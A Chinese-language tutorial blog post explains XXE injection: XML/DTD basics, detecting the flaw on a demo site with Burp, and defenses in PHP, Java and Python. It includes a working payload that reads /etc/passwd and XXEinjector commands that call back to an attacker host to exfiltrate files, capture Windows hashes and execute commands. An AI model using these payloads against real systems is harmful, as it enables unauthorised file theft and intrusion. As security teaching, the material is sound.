XXE漏洞简析

0x00.什么是XXE？

XML外部实体注入(XML External Entity Injection)

XML基础

XML用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型.

是一种允许用户对自己的标记语言进行定义的源语言。

XML文档结构包括XML声明、DTD文档类型定义、文档元素。

DTD(文档类型定义)的作用是定义xml文档的合法构建模块。

DTD 可以在 XML 文档内声明，也可以外部引用。

PCDATA 指的是被解析的字符数据（Parsed Character Data）

XML解析器通常会解析XML文档中所有的文本

 <message>此文本会被解析</message>

当某个XML元素被解析时，其标签之间的文本也会被解析：

 <name><first>Bill</first><last>Gates</last></name>

内部声明DTD

<!DOCTYPE 根元素 [元素声明]>

引用外部DTD

<!DOCTYPE 根元素 SYSTEM “文件名”>

或者

<!DOCTYPE 根元素 PUBLIC “public_ID” “文件名”>

DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量，可以内部声明或外部引用。

内部声明实体

<!ENTITY 实体名称 “实体的值">

引用外部实体

<!ENTITY 实体名称 SYSTEM “URI">

或者

<!ENTITY 实体名称 PUBLIC “public_ID" “URI">

0x01.XML外部实体注入(XML External Entity)

当允许引用外部实体时，通过构造恶意内容，可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。

引入外部实体方式有多种，比如：

恶意引入外部实体方式1：

XML内容：

一个实体由三部分构成: 一个和号 (&), 一个实体名称, 以及一个分号 (;)

恶意引入外部实体方式2：

XML内容：

DTD文件(evil.dtd)内容：

<!ENTITY wintry SYSTEM “file:///etc/passwd">

恶意引入外部实体方式3：

XML内容：

DTD文件(evil.dtd)内容：

<!ENTITY wintry SYSTEM “file:///etc/passwd">

另外，不同程序支持的协议不一样，

上图是默认支持协议，还可以支持其他，如PHP支持的扩展协议有

0x02.XXE危害

主要有两个

1：读取任意文件

2：执行系统命令(安装expect扩展的PHP环境里才有)

0×03.发现XXE漏洞

寻找那些接受XML作为输入内容的端点。

访问演示站点：wintrysec攻防系统-owasp top10-xxe

用Burp抓包，随便输入密码点击登录

观察应用程序的XML传输数据。

请求：

响应：

应用程序正在解析XML内容，接受特定的输入，然后将其呈现给用户

修改请求的XML内容，重放

我们在上面的请求中定义了一个名为wintrysec，值为 'wintrysec666' 的实体

根据响应报文得知，解析器已经解析了我们发送的XML实体，并将实体内容呈现出来了。

由此，可以确认，这个应用程序存在XXE漏洞。

0×04.进行XXE攻击

01.读取任意文件

修改数据包添加以下XML代码：

<?xml version="1.0"?> <!DOCTYPE a [     <!ENTITY wintrysec SYSTEM "file:///etc/passwd"> ]>  <user><username>&wintrysec;</username><password>123</password></user>

重放结果如下图：

成功读取/etc/passwd文件

0×05.XXE自动化工具XXEinjector

项目地址

https://github.com/enjoiz/XXEinjector

简介

XXEinjector是一个使用Ruby编写的自动化xxe漏洞检测工具，可以通过给定一个http请求的包，然后设置好好参数就会自动化的进行fuzz，他会通过内置的规则进行自动化的测试，并且还支持二次注入（通过另一个请求触发漏洞）

参数说明

• host: 用于反向连接的 IP

• path: 要读取的文件或目录

• file: 原始有效的请求信息，可以使用 XXEINJECT 来指出 DTD 要注入的位置

• proxy: 代理服务器

• oob：使用的协议，支持 http/ftp/gopher

• phpfilter：使用 PHP filter 对要读取的内容进行 base64 编码，解决传输文件内容时的编码问题

使用方法

列 /etc 目录 通过https:

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl

二次注入:

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt 

通过http协议暴力枚举文件:

ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc

直接枚举:

ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK

枚举所有端口:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all

获取windows hash:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes

通过java的jar上传文件:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf

执行系统命令使用 PHP expect:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls

测试XSLT注入:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt

记录请求日志:

ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt

0×06.防御XXE攻击

方案一、使用开发语言提供的禁用外部实体的方法

PHP：

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();​dbf.setExpandEntityReferences(false);

Python：

from lxml import etree​xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

方案二、过滤用户提交的XML数据

关键词：

<!DOCTYPE和<!ENTITY，SYSTEM